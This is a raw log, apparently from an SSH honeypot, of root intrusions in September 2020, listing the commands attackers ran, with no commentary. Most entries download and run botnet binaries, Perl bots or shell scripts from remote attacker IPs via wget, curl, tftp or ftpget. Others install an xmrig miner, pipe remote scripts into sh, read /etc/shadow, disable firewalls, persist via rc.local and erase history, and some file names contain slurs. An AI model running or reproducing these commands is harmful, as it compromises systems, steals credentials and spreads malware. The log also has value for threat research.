wget 34.96.189.100/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 34.96.189.100/bot.pl
perl bot.pl
rm -rf bot.pl
history -c

From 45.84.196.99 1-Sep-2020 17:21:11 ssh2 root
Exec wget http://185.132.53.238/wkomqp; chmod 777 wkomqp; ./wkomqp; rm -rf wkomqp; history -c
wget http://185.132.53.238/wkomqp
chmod 777 wkomqp
./wkomqp
rm -rf wkomqp
history -c

From 45.95.168.131 1-Sep-2020 21:43:02 ssh2 root
Exec cat /etc/issue ; payload
cat /etc/issue
payload

From 88.218.17.245 2-Sep-2020 02:27:37 ssh2 root
Exec cd /tmp; wget http://88.218.16.60/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86_64; chmod 777 *; ./zbetcheckin.x86_64 servers; rm -rf *
cd /tmp
wget http://88.218.16.60/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86_64
chmod 777 *
./zbetcheckin.x86_64 servers
rm -rf *

From 107.173.213.43 2-Sep-2020 11:20:19 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://172.245.112.72/SnOoPy.sh; chmod 777 *; sh SnOoPy.sh; tftp -g 172.245.112.72 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://172.245.112.72/SnOoPy.sh
chmod 777 *
sh SnOoPy.sh
tftp -g 172.245.112.72 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 161.35.126.137 2-Sep-2020 16:58:15 ssh2 root
Exec wget http://192.3.251.67/bins/Formula.x86; chmod 777 Formula.x86; ./Formula.x86 roots; rm -rf Formula.* ; history -c
wget http://192.3.251.67/bins/Formula.x86
chmod 777 Formula.x86
./Formula.x86 roots
rm -rf Formula.*
history -c

From 172.245.186.114 2-Sep-2020 19:26:18 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://172.245.5.102/GhOul.sh; chmod 777 GhOul.sh; sh GhOul.sh; tftp 172.245.5.102 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 172.245.5.102; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 172.245.5.102 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://172.245.5.102/GhOul.sh
chmod 777 GhOul.sh
sh GhOul.sh
tftp 172.245.5.102 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 172.245.5.102
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 172.245.5.102 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh
rm -rf *

From 120.92.174.161 3-Sep-2020 05:01:46 ssh2 root
Exec nproc;uname -a;cd /tmp;rm -rf serv*;wget http://200.6.78.183/wp-content/uploads/2020/08/serv.tar.gz; tar xf serv.tar.gz;cd serv;perl ug.txt;rm -rf ug.txt;mv xmrig server;./server  
nproc
uname -a
cd /tmp
rm -rf serv*
wget http://200.6.78.183/wp-content/uploads/2020/08/serv.tar.gz
tar xf serv.tar.gz
cd serv
perl ug.txt
rm -rf ug.txt
mv xmrig server
./server

From 161.35.126.137 4-Sep-2020 01:22:43 ssh2 root
Exec wget http://192.3.251.67/bins/Formula.x86 ; chmod 777 Formula.x86 ; ./Formula.x86 roots ; rm -rf Formula.* ; history -c
wget http://192.3.251.67/bins/Formula.x86
chmod 777 Formula.x86
./Formula.x86 roots
rm -rf Formula.*
history -c

From 212.33.203.172 4-Sep-2020 03:45:48 ssh2 root
Exec cd /tmp; wget http://87.107.146.227/21337321781278fhghdsghfshdvhjcfgdcfhhbgshfjhnhhsvjngjghfvhfgvhh.x86; chmod 777 *; ./21337321781278fhghdsghfshdvhjcfgdcfhhbgshfjhnhhsvjngjghfvhfgvhh.x86 root; rm -rf *
cd /tmp
wget http://87.107.146.227/21337321781278fhghdsghfshdvhjcfgdcfhhbgshfjhnhhsvjngjghfvhfgvhh.x86
chmod 777 *
./21337321781278fhghdsghfshdvhjcfgdcfhhbgshfjhnhhsvjngjghfvhfgvhh.x86 root
rm -rf *

From 104.168.99.225 4-Sep-2020 16:14:49 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://172.245.7.189/GhOul.sh; chmod 777 GhOul.sh; sh GhOul.sh; tftp 172.245.7.189 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 172.245.7.189; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 172.245.7.189 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://172.245.7.189/GhOul.sh
chmod 777 GhOul.sh
sh GhOul.sh
tftp 172.245.7.189 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 172.245.7.189
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 172.245.7.189 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh
rm -rf *

From 159.65.226.212 4-Sep-2020 22:09:19 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://scan.apollonet02.com/xZTYFDBXVSDVS456/HashtagFreeInternet.x86; cat HashtagFreeInternet.x86 > as0f5wq1dv0sw514qwd; chmod +x as0f5wq1dv0sw514qwd; ./as0f5wq1dv0sw514qwd Rooted.VPS; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://scan.apollonet02.com/xZTYFDBXVSDVS456/HashtagFreeInternet.x86
cat HashtagFreeInternet.x86 > as0f5wq1dv0sw514qwd
chmod +x as0f5wq1dv0sw514qwd
./as0f5wq1dv0sw514qwd Rooted.VPS
history -c

From 223.70.163.54 5-Sep-2020 17:11:58 ssh2 root
Exec nproc;; uname -a
nproc
uname -a

From 194.87.138.137 5-Sep-2020 22:49:11 ssh2 root
Exec wget http://185.132.53.238/bins/jKira.x86; chmod 777 jKira.x86; ./jKira.x86 roots; rm -rf jKira.x86; history -c
wget http://185.132.53.238/bins/jKira.x86
chmod 777 jKira.x86
./jKira.x86 roots
rm -rf jKira.x86
history -c

From 64.227.0.131 6-Sep-2020 09:18:54 ssh2 root
Exec wget http://192.3.251.67/bins/Formula.x86 ; chmod 777 Formula.x86 ; ./Formula.x86 roots ; rm -rf Formula.x86* ; history -c
wget http://192.3.251.67/bins/Formula.x86
chmod 777 Formula.x86
./Formula.x86 roots
rm -rf Formula.x86*
history -c

From 207.180.253.118 7-Sep-2020 07:05:27 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 34.92.63.217/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 34.92.63.217/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; wget 192.3.41.172/bins/Ares.x86 ; wget 192.3.41.172/bins/Ares.x32 ; chmod 777 x* ; ./Ares.x86 autoroot.x86 ; ./Ares.32 autoroot.x86 ; rm -rf x* ;history -c ; curl -O 192.3.41.172/bins/Ares.x86 ; curl -O 192.3.41.172/bins/Ares.x32 ; chmod 777 Ares* ; ./Ares.x86 autoroot.x86 ; ./Ares.x32 autoroot.x86 ; rm -rf x* ; history -c
cat /etc/issue
cd /tmp
wget 34.92.63.217/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 34.92.63.217/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
wget 192.3.41.172/bins/Ares.x86
wget 192.3.41.172/bins/Ares.x32
chmod 777 x*
./Ares.x86 autoroot.x86
./Ares.32 autoroot.x86
rm -rf x*
history -c
curl -O 192.3.41.172/bins/Ares.x86
curl -O 192.3.41.172/bins/Ares.x32
chmod 777 Ares*
./Ares.x86 autoroot.x86
./Ares.x32 autoroot.x86
rm -rf x*
history -c

From 88.218.17.176 7-Sep-2020 22:36:10 ssh2 root
Exec cd /tmp; wget http://172.245.104.116/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86_64; chmod 777 *; ./zbetcheckin.x86_64 servers; rm -rf *
cd /tmp
wget http://172.245.104.116/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86_64
chmod 777 *
./zbetcheckin.x86_64 servers
rm -rf *

From 45.95.168.157 8-Sep-2020 03:04:22 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.49.224.207/horny.sh; curl -O http:/37.49.224.207/horny.sh; chmod 777 horny.sh; sh horny.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://37.49.224.207/horny.sh
curl -O http:/37.49.224.207/horny.sh
chmod 777 horny.sh
sh horny.sh
rm -rf *
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.49.224.207/horny.sh; curl -O http:/37.49.224.207/horny.sh; chmod 777 horny.sh; sh horny.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://37.49.224.207/horny.sh
curl -O http:/37.49.224.207/horny.sh
chmod 777 horny.sh
sh horny.sh
rm -rf *

From 198.91.86.83 8-Sep-2020 08:46:36 ssh2 root
Exec uname -a;id;cat /etc/shadow;wget -qO - http://tung-shu.cf/o|perl;wget http://tung-shu.cf/x -O /tmp/x;chmod +x /tmp/x;/tmp/x;rm -f /tmp/x
uname -a
id
cat /etc/shadow
wget -qO - http://tung-shu.cf/o|perl
wget http://tung-shu.cf/x -O /tmp/x
chmod +x /tmp/x
/tmp/x
rm -f /tmp/x

From 138.68.4.8 8-Sep-2020 12:11:57 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
Exec ping 8.8.8.8
ping 8.8.8.8

From 35.226.189.158 8-Sep-2020 17:36:46 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 192.3.41.172/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 192.3.41.172/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c
cat /etc/issue
cd /tmp
wget 192.3.41.172/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 192.3.41.172/bot.pl
perl bot.pl
rm -rf bot.pl
history -c

From 178.62.106.98 9-Sep-2020 04:59:47 ssh2 root
Exec nproc;cd /tmp;wget http://156.67.221.1/p.jpg;curl -O http://http://156.67.221.1/p.jpg;perl p.jpg;rm -rf p.*;rm -rf p.jpg
nproc
cd /tmp
wget http://156.67.221.1/p.jpg
curl -O http://http://156.67.221.1/p.jpg
perl p.jpg
rm -rf p.*
rm -rf p.jpg

From 45.95.168.126 9-Sep-2020 21:02:58 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.230/VPS.sh; cat VPS.sh > x0x524c1e4; chmod +x x0x524c1e4; ./x0x524c1e4; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://45.95.168.230/VPS.sh
cat VPS.sh > x0x524c1e4
chmod +x x0x524c1e4
./x0x524c1e4
history -c

From 194.180.224.103 11-Sep-2020 16:39:06 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.112/LoliBinsXxX.sh; curl -O http://194.180.224.112/LoliBinsXxX.sh; chmod 777 LoliBinsXxX.sh; sh LoliBinsXxX.sh; tftp 194.180.224.112 -c get LoliBinsXxX.sh; chmod 777 LoliBinsXxX.sh; sh LoliBinsXxX.sh; tftp -r LoliBinsXxX2.sh -g 194.180.224.112; chmod 777 LoliBinsXxX2.sh; sh LoliBinsXxX2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.112 LoliBinsXxX1.sh LoliBinsXxX1.sh; sh LoliBinsXxX1.sh; rm -rf LoliBinsXxX.sh LoliBinsXxX.sh LoliBinsXxX2.sh LoliBinsXxX1.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://194.180.224.112/LoliBinsXxX.sh
curl -O http://194.180.224.112/LoliBinsXxX.sh
chmod 777 LoliBinsXxX.sh
sh LoliBinsXxX.sh
tftp 194.180.224.112 -c get LoliBinsXxX.sh
chmod 777 LoliBinsXxX.sh
sh LoliBinsXxX.sh
tftp -r LoliBinsXxX2.sh -g 194.180.224.112
chmod 777 LoliBinsXxX2.sh
sh LoliBinsXxX2.sh
ftpget -v -u anonymous -p anonymous -P 21 194.180.224.112 LoliBinsXxX1.sh LoliBinsXxX1.sh
sh LoliBinsXxX1.sh
rm -rf LoliBinsXxX.sh LoliBinsXxX.sh LoliBinsXxX2.sh LoliBinsXxX1.sh
rm -rf *

From 2.57.122.204 12-Sep-2020 23:17:45 ssh2 root
Exec cd /tmp; wget http://88.218.16.60/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86_64; chmod 777 *; ./zbetcheckin.x86_64 servers; rm -rf *;pkill ssh
cd /tmp
wget http://88.218.16.60/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86_64
chmod 777 *
./zbetcheckin.x86_64 servers
rm -rf *
pkill ssh

From 193.228.91.11 13-Sep-2020 04:22:42 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.145.185.94/Otpzl/7rtya.x86; curl -O http://45.145.185.94/Otpzl/7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 Exploit.x86; rm -rf 7rtya.x86; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.145.185.94/Otpzl/7rtya.x86
curl -O http://45.145.185.94/Otpzl/7rtya.x86
chmod +x 7rtya.x86
./7rtya.x86 Exploit.x86
rm -rf 7rtya.x86
history -c

From 175.24.123.205 13-Sep-2020 12:22:03 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://175.24.123.205:88/Ms;chmod 777 Ms;./Ms;echo "cd /tmp/">>/etc/rc.local;echo "./Ms&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://175.24.123.205:88/Ms
chmod 777 Ms
./Ms
echo "cd /tmp/">>/etc/rc.local
echo "./Ms
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 142.93.195.249 13-Sep-2020 18:28:52 ssh2 root
Exec wget http://192.3.199.170/bins/Formula.x86 ; chmod 777 Formula.x86 ; ./Formula.x86 roots ; rm -rf Formula.* ; history -c
wget http://192.3.199.170/bins/Formula.x86
chmod 777 Formula.x86
./Formula.x86 roots
rm -rf Formula.*
history -c

From 161.35.78.255 15-Sep-2020 00:00:40 ssh2 root
Exec wget http://161.35.78.255/manager.sh -O- | sh || curl http://161.35.78.255/manager.sh | sh
wget http://161.35.78.255/manager.sh -O- | sh || curl http://161.35.78.255/manager.sh | sh

From 161.35.78.255 15-Sep-2020 00:00:41 ssh2 root
Exec echo -en '\x6e\x65\x78\x75\x73'
echo -en '\x6e\x65\x78\x75\x73'

From 104.244.78.67 15-Sep-2020 04:12:23 ssh2 root
Exec wget -O- http://www.bing.com
wget -O- http://www.bing.com

From 45.14.224.106 15-Sep-2020 05:16:08 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://45.14.224.106/Percocetbins.sh; chmod 777 Percocetbins.sh; sh Percocetbins.sh; tftp 45.14.224.106 -c get Percocettftp1.sh; chmod 777 Percocettftp1.sh; sh Percocettftp1.sh; tftp -r Percocettftp2.sh -g 45.14.224.106; chmod 777 Percocettftp2.sh; sh Percocettftp2.sh; rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://45.14.224.106/Percocetbins.sh
chmod 777 Percocetbins.sh
sh Percocetbins.sh
tftp 45.14.224.106 -c get Percocettftp1.sh
chmod 777 Percocettftp1.sh
sh Percocettftp1.sh
tftp -r Percocettftp2.sh -g 45.14.224.106
chmod 777 Percocettftp2.sh
sh Percocettftp2.sh
rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh
rm -rf *

From 142.93.195.249 15-Sep-2020 22:31:40 ssh2 root
Exec wget http://192.3.199.170/bins/Formula.x86; chmod 777 Formula.x86; ./Formula.x86 roots; rm -rf Formula.* ; history -c
wget http://192.3.199.170/bins/Formula.x86
chmod 777 Formula.x86
./Formula.x86 roots
rm -rf Formula.*
history -c

From 212.33.199.173 16-Sep-2020 04:52:28 ssh2 root
Exec cd /tmp; wget http://209.190.46.193/zbetcheckin.x86_64; chmod 777 *; ./zbetcheckin.x86_64 mnimaan; rm -rf *
cd /tmp
wget http://209.190.46.193/zbetcheckin.x86_64
chmod 777 *
./zbetcheckin.x86_64 mnimaan
rm -rf *

From 2.57.122.204 16-Sep-2020 14:43:32 ssh2 root
Exec cd /tmp; wget http://209.190.46.193/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86_64; chmod 777 *; ./zbetcheckin.x86_64 servers; rm -rf *;pkill ssh
cd /tmp
wget http://209.190.46.193/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86_64
chmod 777 *
./zbetcheckin.x86_64 servers
rm -rf *
pkill ssh

From 194.180.224.115 16-Sep-2020 15:12:16 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://37.49.224.207/FuckBitchBastardDamnCuntJesusHaroldChristbins.sh; chmod 777 FuckBitchBastardDamnCuntJesusHaroldChristbins.sh; sh FuckBitchBastardDamnCuntJesusHaroldChristbins.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /run || cd /
wget http://37.49.224.207/FuckBitchBastardDamnCuntJesusHaroldChristbins.sh
chmod 777 FuckBitchBastardDamnCuntJesusHaroldChristbins.sh
sh FuckBitchBastardDamnCuntJesusHaroldChristbins.sh
rm -rf *

From 165.232.70.17 17-Sep-2020 01:09:11 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://194.87.138.225/Percocetbins.sh; chmod 777 Percocetbins.sh; sh Percocetbins.sh; tftp 194.87.138.225 -c get Percocettftp1.sh; chmod 777 Percocettftp1.sh; sh Percocettftp1.sh; tftp -r Percocettftp2.sh -g 194.87.138.225; chmod 777 Percocettftp2.sh; sh Percocettftp2.sh; rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://194.87.138.225/Percocetbins.sh
chmod 777 Percocetbins.sh
sh Percocetbins.sh
tftp 194.87.138.225 -c get Percocettftp1.sh
chmod 777 Percocettftp1.sh
sh Percocettftp1.sh
tftp -r Percocettftp2.sh -g 194.87.138.225
chmod 777 Percocettftp2.sh
sh Percocettftp2.sh
rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh
rm -rf *

From 5.14.57.253 17-Sep-2020 11:31:57 ssh2 root
w
lscpu
ip a
w
wget http://130.0.164.120/scan.jpg
wget http://130.0.164.120/scan.jpg --no-check-certificate
curl -O http://130.0.164.120/scan.jpg
lwp-download
wget
yum
apt-get
apt-get install curl
apt-get install curl install curl curl install curl install curl curl curl install curl curl install curl install curl curl install curl install curl curl curl install curl curl curl install
w
who
uname -a
ls -a
w
curl
apt-get install curl
curl
/usr/bin/curl
find
id richard
lscpu
ls -a

From 141.98.81.141 17-Sep-2020 11:37:01 ssh2 root
wget http://130.0.164.120/scan.jpg ls -a
ls -a
cat test1.pl
cay proxy.doc
cay proxy.doc
cat proxy.doc
halt
reboot
init 1
w
apt-get install savatragmuie

From 198.91.86.83 17-Sep-2020 21:27:58 ssh2 root
Exec uname -a;id;cat /etc/shadow;wget http://tung-shu.cf/execute -O .bashrx;chmod +x .bashrx;./.bashrx;rm -f .bashrx
uname -a
id
cat /etc/shadow
wget http://tung-shu.cf/execute -O .bashrx
chmod +x .bashrx
./.bashrx
rm -f .bashrx

From 34.95.213.154 17-Sep-2020 23:03:10 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 185.239.242.92/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 rm -rf nigga* ; curl -O wget 185.239.242.92/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 ; rm -rf nigga* ; wget 192.3.41.172/bot.pl ; perl bot.pl ; history -c
cat /etc/issue
cd /tmp
wget 185.239.242.92/nigga.x86
chmod 777 nigga.x86
./nigga.x86 autorooter.x86 rm -rf nigga*
curl -O wget 185.239.242.92/nigga.x86
chmod 777 nigga.x86
./nigga.x86 autorooter.x86
rm -rf nigga*
wget 192.3.41.172/bot.pl
perl bot.pl
history -c

From 95.111.254.164 18-Sep-2020 07:21:58 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.23.137.142/SnOoPy.sh; chmod 777 *; sh SnOoPy.sh; tftp -g 198.23.137.142 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://198.23.137.142/SnOoPy.sh
chmod 777 *
sh SnOoPy.sh
tftp -g 198.23.137.142 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 193.228.91.11 18-Sep-2020 10:11:25 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.109/Otpzl/7rtya.x86; curl -O http://193.228.91.109/Otpzl/7rtya.x86; tftp 193.228.91.109 -c get 7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 Exploit.x86;rm -rf 7rtya.x86; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://193.228.91.109/Otpzl/7rtya.x86
curl -O http://193.228.91.109/Otpzl/7rtya.x86
tftp 193.228.91.109 -c get 7rtya.x86
chmod +x 7rtya.x86
./7rtya.x86 Exploit.x86
rm -rf 7rtya.x86
history -c

From 34.95.37.227 18-Sep-2020 15:29:32 ssh2 root
Exec cat /etc/issue ; wget 178.255.101.213/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 178.255.101.213/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c
cat /etc/issue
wget 178.255.101.213/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
curl -O 178.255.101.213/bot.pl
perl bot.pl
rm -rf bot.pl
history -c

From 129.211.205.21 19-Sep-2020 01:23:20 ssh2 root
Exec nproc;uname -a;cd /tmp;rm -rf serv*;wget http://200.6.78.183/wp-content/uploads/2020/08/serv.tar.gz;tar xf serv.tar.gz;cd serv;perl ug.txt;chmod +x * ;mv xmrig server;./server  
nproc
uname -a
cd /tmp
rm -rf serv*
wget http://200.6.78.183/wp-content/uploads/2020/08/serv.tar.gz
tar xf serv.tar.gz
cd serv
perl ug.txt
chmod +x *
mv xmrig server
./server

From 77.39.117.226 19-Sep-2020 10:28:07 ssh2 root
Exec nproc;uname -a;cd /tmp;rm -rf serv*;wget http://200.6.78.183/wp-content/uploads/2020/08/serv.tar.gz; tar xf serv.tar.gz;perl ug.txt;cd serv;perl ug.txt;rm -rf ug.txt;mv xmrig server;./server   
nproc
uname -a
cd /tmp
rm -rf serv*
wget http://200.6.78.183/wp-content/uploads/2020/08/serv.tar.gz
tar xf serv.tar.gz
perl ug.txt
cd serv
perl ug.txt
rm -rf ug.txt
mv xmrig server
./server

From 212.33.199.172 19-Sep-2020 14:04:17 ssh2 root
Exec cd /tmp; wget http://88.218.16.60/zbetcheckin.x86_64; chmod 777 *; ./zbetcheckin.x86_64 mnimaan; rm -rf *
cd /tmp
wget http://88.218.16.60/zbetcheckin.x86_64
chmod 777 *
./zbetcheckin.x86_64 mnimaan
rm -rf *

From 45.95.168.157 19-Sep-2020 15:11:01 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.49.224.207/horny.sh; curl -O http:/37.49.224.207/horny.sh; chmod 777 horny.sh; sh horny.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://37.49.224.207/horny.sh
curl -O http:/37.49.224.207/horny.sh
chmod 777 horny.sh
sh horny.sh
rm -rf *

From 77.39.117.226 19-Sep-2020 15:56:44 ssh2 root
Exec npeoc;uname -a;cd /tmp;rm -rf serv*;wget http://200.6.78.183/wp-content/uploads/2020/08/serv.tar.gz; tar xf serv.tar.gz;perl ug.txt;cd serv;perl ug.txt;rm -rf ug.txt;mv xmrig server;./server   
npeoc
uname -a
cd /tmp
rm -rf serv*
wget http://200.6.78.183/wp-content/uploads/2020/08/serv.tar.gz
tar xf serv.tar.gz
perl ug.txt
cd serv
perl ug.txt
rm -rf ug.txt
mv xmrig server
./server

From 45.14.224.164 19-Sep-2020 18:45:12 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://45.14.224.110/Percocetbins.sh; chmod 777 Percocetbins.sh; sh Percocetbins.sh; tftp 45.14.224.110 -c get Percocettftp1.sh; chmod 777 Percocettftp1.sh; sh Percocettftp1.sh; tftp -r Percocettftp2.sh -g 45.14.224.110; chmod 777 Percocettftp2.sh; sh Percocettftp2.sh; rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://45.14.224.110/Percocetbins.sh
chmod 777 Percocetbins.sh
sh Percocetbins.sh
tftp 45.14.224.110 -c get Percocettftp1.sh
chmod 777 Percocettftp1.sh
sh Percocettftp1.sh
tftp -r Percocettftp2.sh -g 45.14.224.110
chmod 777 Percocettftp2.sh
sh Percocettftp2.sh
rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh
rm -rf *

From 35.234.143.159 20-Sep-2020 03:32:29 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 185.239.242.92/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 rm -rf nigga* ; curl -O wget 185.239.242.92/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 ; rm -rf nigga* ; wget 178.255.101.213/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 178.255.101.213/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c
cat /etc/issue
cd /tmp
wget 185.239.242.92/nigga.x86
chmod 777 nigga.x86
./nigga.x86 autorooter.x86 rm -rf nigga*
curl -O wget 185.239.242.92/nigga.x86
chmod 777 nigga.x86
./nigga.x86 autorooter.x86
rm -rf nigga*
wget 178.255.101.213/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
curl -O 178.255.101.213/bot.pl
perl bot.pl
rm -rf bot.pl
history -c

From 193.239.147.224 20-Sep-2020 13:21:05 ssh2 root
Exec nc 1 1; echo lmfao goodbye; cat /etc/issue
nc 1 1
echo lmfao goodbye
cat /etc/issue

From 193.228.91.11 20-Sep-2020 15:59:22 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.145.185.94/Otpzl/vwd.x86; curl -O http://45.145.185.94/Otpzl/vwd.x86; chmod +x vwd.x86; ./vwd.x86 Exploit.x86; rm -rf vwd.x86; tftp 45.145.185.94 -c get 7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 TFTP.Exploit.x86;rm -rf 7rtya.x86; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.145.185.94/Otpzl/vwd.x86
curl -O http://45.145.185.94/Otpzl/vwd.x86
chmod +x vwd.x86
./vwd.x86 Exploit.x86
rm -rf vwd.x86
tftp 45.145.185.94 -c get 7rtya.x86
chmod +x 7rtya.x86
./7rtya.x86 TFTP.Exploit.x86
rm -rf 7rtya.x86
history -c

From 37.49.230.184 20-Sep-2020 18:31:19 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.49.230.184/Lizard.sh; chmod 777 Lizard.sh; sh Lizard.sh; tftp 37.49.230.184 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 37.49.230.184; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 37.49.230.184 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf Lizard.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://37.49.230.184/Lizard.sh
chmod 777 Lizard.sh
sh Lizard.sh
tftp 37.49.230.184 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 37.49.230.184
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 37.49.230.184 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf Lizard.sh tftp1.sh tftp2.sh ftp1.sh
rm -rf *

From 194.180.224.115 20-Sep-2020 22:29:06 ssh2 root
